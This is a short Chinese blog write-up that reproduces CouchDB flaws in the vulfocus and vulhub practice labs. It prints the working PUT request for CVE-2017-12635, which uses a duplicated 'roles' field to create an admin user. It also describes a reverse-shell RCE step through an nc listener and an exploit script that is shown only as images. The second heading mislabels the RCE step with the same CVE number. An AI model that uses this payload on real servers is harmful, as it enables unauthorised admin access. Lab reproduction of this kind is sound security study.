CouchDB漏洞复现

CouchDB漏洞复现在vulfocus环境下

一、漏洞复现地址如下:
https://vulfocus.cn/
二、CouchDB复现权限绕过(CVE-2017-12635)
小于 1.7.0 以及 小于 2.1.1
可绕过创建权限而去实现任意创建admin权限的账号 实现登录。
1、正常创建数据包(发现无权限)
CouchDB漏洞复现_第1张图片2、绕过权限数据包

PUT /_users/org.couchdb.user:vulhub

{

  "type": "user",

  "name": "vulhub",

  "roles": ["_admin"],

  "roles": [],

  "password": "vulhub"

}

CouchDB漏洞复现_第2张图片3、成功实现绕过,到/_utils 目录下验证登陆。
三、CouchDB复现权限绕过(CVE-2017-12635)
实现权限绕过 并成功登录admin账号后,可实现此漏洞实现rce。直接使用了网上SF的exp脚本反弹shell如下:
CouchDB漏洞复现_第3张图片这个环境换到了本地搭建的vulhub。
攻击机nc监听,直接执行脚本文件:
CouchDB漏洞复现_第4张图片

你可能感兴趣的:(漏洞复现,couchdb,安全,web安全)